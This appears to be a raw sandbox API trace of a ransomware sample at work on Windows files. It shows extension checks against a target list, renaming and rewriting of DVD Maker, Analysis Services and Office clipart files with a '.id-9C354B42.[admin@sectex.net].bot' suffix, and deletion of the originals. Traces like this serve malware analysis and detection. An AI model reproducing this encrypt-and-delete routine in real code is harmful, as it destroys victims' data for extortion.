	[0049.181] lstrlenW (lpString=".dbf") returned 4
	[0049.181] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0050.448] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.449] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.489] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.489] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.490] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.490] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.491] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.491] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.491] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.492] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.492] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0050.492] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0051.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0051.701] GetLastError () returned 0x0
	[0051.701] ReadFile (in: hFile=0x21c, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x4360, lpOverlapped=0x0) returned 1
	[0051.719] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x4370, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x4370, lpOverlapped=0x0) returned 1
	[0051.721] ReadFile (in: hFile=0x21c, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0051.721] WriteFile (in: hFile=0x1c0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0051.721] SetEndOfFile (hFile=0x1c0) returned 1
	[0051.721] CloseHandle (hObject=0x1c0) returned 1
	[0051.721] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.721] SetEndOfFile (hFile=0x21c) returned 1
	[0051.722] CloseHandle (hObject=0x21c) returned 1
	[0051.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0051.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl")) returned 1
	[0052.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.063] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.063] lstrlenW (lpString=".doc") returned 4
	[0052.063] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.063] lstrlenW (lpString=".docx") returned 5
	[0052.063] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.063] lstrlenW (lpString=".pdf") returned 4
	[0052.063] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.063] lstrlenW (lpString=".xls") returned 4
	[0052.063] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.063] lstrlenW (lpString=".xlsx") returned 5
	[0052.063] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.063] lstrlenW (lpString=".ppt") returned 4
	[0052.063] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.072] lstrlenW (lpString=".zip") returned 4
	[0052.072] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.072] lstrlenW (lpString=".rar") returned 4
	[0052.072] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.072] lstrlenW (lpString=".bz2") returned 4
	[0052.072] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.072] lstrlenW (lpString=".7z") returned 3
	[0052.072] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.072] lstrlenW (lpString=".dbf") returned 4
	[0052.072] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.072] lstrlenW (lpString=".1cd") returned 4
	[0052.072] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.072] lstrlenW (lpString=".jpg") returned 4
	[0052.072] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.080] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.080] lstrlenW (lpString=".doc") returned 4
	[0052.080] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.080] lstrlenW (lpString=".docx") returned 5
	[0052.080] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.080] lstrlenW (lpString=".pdf") returned 4
	[0052.080] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.080] lstrlenW (lpString=".xls") returned 4
	[0052.087] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.090] lstrlenW (lpString=".xlsx") returned 5
	[0052.090] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.090] lstrlenW (lpString=".ppt") returned 4
	[0052.090] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.090] lstrlenW (lpString=".zip") returned 4
	[0052.090] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.090] lstrlenW (lpString=".rar") returned 4
	[0052.090] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.090] lstrlenW (lpString=".bz2") returned 4
	[0052.090] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.097] lstrlenW (lpString=".7z") returned 3
	[0052.098] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.098] lstrlenW (lpString=".dbf") returned 4
	[0052.098] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.098] lstrlenW (lpString=".1cd") returned 4
	[0052.098] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76
	[0052.098] lstrlenW (lpString=".jpg") returned 4
	[0052.098] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.098] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0052.098] lstrlenW (lpString="AG00011_.GIF") returned 12
	[0052.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158
	[0053.350] GetFileSizeEx (in: hFile=0x158, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=7216) returned 1
	[0053.353] CloseHandle (hObject=0x158) returned 1
	[0053.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 0x20
	[0053.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.369] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.369] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0053.371] GetLastError () returned 0x0
	[0053.371] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x1c30, lpOverlapped=0x0) returned 1
	[0053.373] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x1c40, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x1c40, lpOverlapped=0x0) returned 1
	[0053.374] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.374] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.374] SetEndOfFile (hFile=0x1b0) returned 1
	[0053.374] CloseHandle (hObject=0x1b0) returned 1
	[0053.375] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.375] SetEndOfFile (hFile=0x194) returned 1
	[0053.375] CloseHandle (hObject=0x194) returned 1
	[0053.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.376] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00011_.gif")) returned 1
	[0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.376] lstrlenW (lpString=".doc") returned 4
	[0053.376] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.376] lstrlenW (lpString=".docx") returned 5
	[0053.376] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.376] lstrlenW (lpString=".pdf") returned 4
	[0053.376] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.376] lstrlenW (lpString=".xls") returned 4
	[0053.376] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.376] lstrlenW (lpString=".xlsx") returned 5
	[0053.376] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.376] lstrlenW (lpString=".ppt") returned 4
	[0053.376] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.376] lstrlenW (lpString=".zip") returned 4
	[0053.376] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.376] lstrlenW (lpString=".rar") returned 4
	[0053.376] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.376] lstrlenW (lpString=".bz2") returned 4
	[0053.376] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.376] lstrlenW (lpString=".7z") returned 3
	[0053.376] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.376] lstrlenW (lpString=".dbf") returned 4
	[0053.376] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.377] lstrlenW (lpString=".1cd") returned 4
	[0053.377] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.377] lstrlenW (lpString=".jpg") returned 4
	[0053.377] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.377] lstrlenW (lpString=".doc") returned 4
	[0053.377] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0053.377] lstrlenW (lpString=".docx") returned 5
	[0053.377] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0053.377] lstrlenW (lpString=".pdf") returned 4
	[0053.377] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0053.377] lstrlenW (lpString=".xls") returned 4
	[0053.377] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0053.377] lstrlenW (lpString=".xlsx") returned 5
	[0053.377] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0053.377] lstrlenW (lpString=".ppt") returned 4
	[0053.377] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.377] lstrlenW (lpString=".zip") returned 4
	[0053.377] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0053.377] lstrlenW (lpString=".rar") returned 4
	[0053.377] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0053.377] lstrlenW (lpString=".bz2") returned 4
	[0053.377] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0053.377] lstrlenW (lpString=".7z") returned 3
	[0053.377] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.377] lstrlenW (lpString=".dbf") returned 4
	[0053.377] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.377] lstrlenW (lpString=".1cd") returned 4
	[0053.378] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0053.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 63
	[0053.378] lstrlenW (lpString=".jpg") returned 4
	[0053.378] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0053.378] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0053.378] lstrlenW (lpString="AG00090_.GIF") returned 12
	[0053.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.378] GetFileSizeEx (in: hFile=0x194, lpFileSize=0xa41ff1c | out: lpFileSize=0xa41ff1c*=517) returned 1
	[0053.378] CloseHandle (hObject=0x194) returned 1
	[0053.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 0x20
	[0053.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194
	[0053.378] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.378] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0053.379] GetLastError () returned 0x0
	[0053.379] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x205, lpOverlapped=0x0) returned 1
	[0053.380] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0x210, lpOverlapped=0x0) returned 1
	[0053.380] ReadFile (in: hFile=0x194, lpBuffer=0xafa0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa41fed4, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesRead=0xa41fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.380] WriteFile (in: hFile=0x1b0, lpBuffer=0xafa0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa41fc9c, lpOverlapped=0x0 | out: lpBuffer=0xafa0020*, lpNumberOfBytesWritten=0xa41fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.381] SetEndOfFile (hFile=0x1b0) returned 1
	[0053.381] CloseHandle (hObject=0x1b0) returned 1
	[0053.381] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa41fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.381] SetEndOfFile (hFile=0x194) returned 1
	[0053.382] CloseHandle (hObject=0x194) returned 1
	[0053.382] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.382] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 1
